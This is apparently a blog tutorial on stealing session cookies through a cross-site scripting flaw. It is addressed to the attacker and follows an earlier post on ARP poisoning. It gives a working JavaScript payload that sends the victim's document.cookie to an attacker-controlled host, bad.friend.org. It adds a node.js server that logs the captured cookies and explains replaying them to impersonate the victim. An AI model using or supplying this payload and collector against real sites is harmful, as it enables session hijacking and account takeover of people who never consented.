Previously, we demonstrated how to use ARP poisoning to compromise unencrypted communication on a local area network (LAN). The attack described below does not depend on your network position: the injected script runs inside the victim's browser, so it works against sites served over HTTPS and from anywhere on the internet.

Cookie Stealing

First, you need an entry point: a cross-site scripting (XSS) vulnerability on the target website. The injected script makes the victim's browser send its cookies to a server you control. One caveat: cookies set with the HttpOnly flag are not exposed through document.cookie, so they cannot be stolen this way.

JavaScript Injection

For the code snippet below, we assume your server is reachable at the domain bad.friend.org. The payload issues a background AJAX request, which the victim is unlikely to notice. The request is cross-origin, so the browser will not let the script read the response, but the request itself, with the cookies in its query string, is still sent. If the vulnerable page is served over HTTPS, your server must be reachable over https:// as well, otherwise the browser blocks the request as mixed content.

// encodeURIComponent, not encodeURI: cookie strings contain ';', '=' and
// sometimes '&', which encodeURI leaves untouched and which would corrupt
// the query parameter on the receiving side.
const yourCookie = encodeURIComponent(document.cookie);

// Use https:// here when the vulnerable page is itself served over HTTPS.
const url = `http://bad.friend.org/gimmie?yourCookies=${yourCookie}`;

// Fire-and-forget GET; the response is never read.
const xhr = new XMLHttpRequest();
xhr.open('GET', url, true);
xhr.send();

Basic node.js Server

This is a minimal node.js server that prints HTTP request parameters to standard output.

const http = require('http');

http.createServer((req, res) => {
  // req.url carries only path and query string; log everything after the '?'.
  const i = req.url.indexOf('?');
  if (i !== -1)
    console.log(req.socket.remoteAddress + ' ' + req.url.substring(i));

  // Answer something harmless so the request does not look like an error.
  res.end('thanks buddy\n');
}).listen(process.env.PORT || 8125);

With the captured session cookie you can impersonate the victim by replaying it from your own browser. The Chrome extension EditThisCookie makes setting a cookie by hand easy.

Alternative Approaches

Your situation might constrain the available options, for example when the injection point does not allow a full script block. More examples are available on GitHub.